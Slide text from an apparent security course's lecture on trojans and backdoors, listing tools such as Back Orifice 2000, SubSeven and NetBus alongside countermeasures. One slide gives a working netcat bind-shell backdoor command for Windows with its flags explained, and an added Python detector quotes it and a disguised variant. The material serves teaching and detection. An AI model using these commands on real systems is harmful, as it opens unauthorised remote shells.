Week 6-1 Week 6: Trojans and Backdoors What is a Trojan Horse? Overt and Covert.


Week 6-2 Week 6: Trojans and Backdoors Hacking Tool: QAZ Hacking Tool: Tini Hacking Tool: Netcat

Week 6-3 Netcat in Action as Backdoor

Remote command prompt anyone? On a Windows NT server, issue the following command in the directory that contains netcat:

    nc -l -p1234 -d -e cmd.exe -L

The -l puts netcat into listen mode, the -p1234 tells netcat to use port 1234, the -d allows netcat to run detached from the console, the -e cmd.exe tells netcat to execute the cmd.exe program when a connection is made, and the -L will restart netcat with the same command line when the connection is terminated.

On the client system, issue the following command:

    nc destination 1234

This command causes netcat to connect to the server named destination on port 1234. Immediately you are given a console connection to the destination server. Be careful! To exit the remote console session, type:

    exit

You will be returned to your own console and will be able to reconnect to the destination server because netcat was started on the destination server with the -L option.
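Added example (not part of the original slides): a detection heuristic that flags the listener command line described above by its flag pattern rather than its file name, since the binary can be renamed. The function names, the shell list and the sample process listing are assumptions made for illustration.

```python
SHELLS = {"cmd", "cmd.exe", "command.com", "sh", "bash"}  # assumed list of shells to alert on

def parse_listener(cmdline):
    """Read netcat-style flags from a command line, ignoring the binary name."""
    argv = cmdline.split()
    f = {"listen": False, "persistent": False, "detached": False, "port": None, "exec": None}
    i = 1
    while i < len(argv):
        arg = argv[i]
        if arg.startswith("-"):
            for j, c in enumerate(arg[1:], start=1):
                if c == "l":
                    f["listen"] = True
                elif c == "L":                  # -L: listen again after each disconnect
                    f["listen"] = f["persistent"] = True
                elif c == "d":
                    f["detached"] = True
                elif c in "pe":                 # flags that take a value
                    value = arg[j + 1:]         # attached form: -p1234
                    if not value and i + 1 < len(argv):
                        i += 1                  # separate form: -p 1234
                        value = argv[i]
                    f["port" if c == "p" else "exec"] = value
                    break
        i += 1
    return f

def shell_listener(cmdline):
    """Return the parsed flags if the command binds a shell to a listening port, else None."""
    f = parse_listener(cmdline)
    if not (f["listen"] and f["exec"]):
        return None
    program = f["exec"].replace("\\", "/").rsplit("/", 1)[-1].lower()
    if program not in SHELLS:
        return None
    f["port"] = int(f["port"]) if f["port"] and f["port"].isdigit() else None
    return f

# Constructed process listing (pid, command line); not captured from a real host.
SAMPLE = [
    (412, "nc -l -p1234 -d -e cmd.exe -L"),
    (980, r"C:\WINNT\system32\svch0st.exe -L -d -p 4444 -e C:\WINNT\system32\cmd.exe"),
    (1500, "nc -l -p 8080"),                    # plain listener, no program attached
    (77, "grep -l -e error app.log"),           # same flag letters, not a shell
]

def scan(processes):
    """Return {pid: flags} for each (pid, cmdline) that looks like a shell listener."""
    return {pid: f for pid, cmd in processes if (f := shell_listener(cmd))}
```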

Week 6-4 Week 6: Trojans and Backdoors Hacking Tool: Donald Dick Hacking Tool: SubSeven Hacking Tool: BackOrifice 2000 Back Orifice Plug-ins

Week 6-5 Back Orifice 2000

Can be used by a network administrator to remotely configure systems.
It can also be used as a Trojan/Backdoor by attackers.
Can run under any filename.
Uses TCP port and UDP by default but can use any other port.
Can disguise itself as Explorer.exe.
Can use strong encryption.
Open source.
Countermeasure: BackOfficer Friendly (nfr.net/products/bof)

Week 6-6 Some BO2K Plugins

BOPeep - provides streaming video of the victim's screen to the attacker.
Encryption - Blowfish, CAST-256, IDEA, RC6 (stronger than most commercial systems).
BOSOCK32 - stealth capabilities using ICMP.
STCPIO - stealth using an encrypted flow between the BO2K GUI and server.

Week 6-7 Week 6: Trojans and Backdoors Hacking Tool: NetBus Wrappers

Week 6-8 Week 6: Trojans and Backdoors Hacking Tool: Graffiti Hacking Tool: Silk Rope 2000 Hacking Tool: EliteWrap Hacking Tool: IconPlus

Week 6-9 Week 6: Trojans and Backdoors Packaging Tool: Microsoft WordPad Hacking Tool: Whack a Mole

Week 6-10 Week 6: Trojans and Backdoors Trojan Construction Kit BoSniffer Hacking Tool: FireKiller 2000

Week 6-11 Week 6: Trojans and Backdoors Covert Channels ICMP Tunneling Hacking Tool: Loki

Week 6-12 Week 6: Trojans and Backdoors Reverse WWW Shell Backdoor Countermeasures

Week 6-13 Week 6: Trojans and Backdoors BO Startup and Registry Entries NetBus Startup and Registry Keys

Week 6-14 Week 6: Trojans and Backdoors Port Monitoring Tools fPort (foundstone.com) TCPView ( tcpview.shtml) Process Viewer

Week 6-15 Week 6: Trojans and Backdoors Inzider - Tracks Processes and Ports ( ) Trojan Maker

Week 6-16 Week 6: Trojans and Backdoors Hacking Tool: Hard Disk Killer Man-in-the-Middle Attack Hacking Tool: dsniff

Week 6-17 Week 6: Trojans and Backdoors System File Verification TripWire (tripwire.com, tripwire.org)

Week 6-18 Week 6: Trojans and Backdoors Summary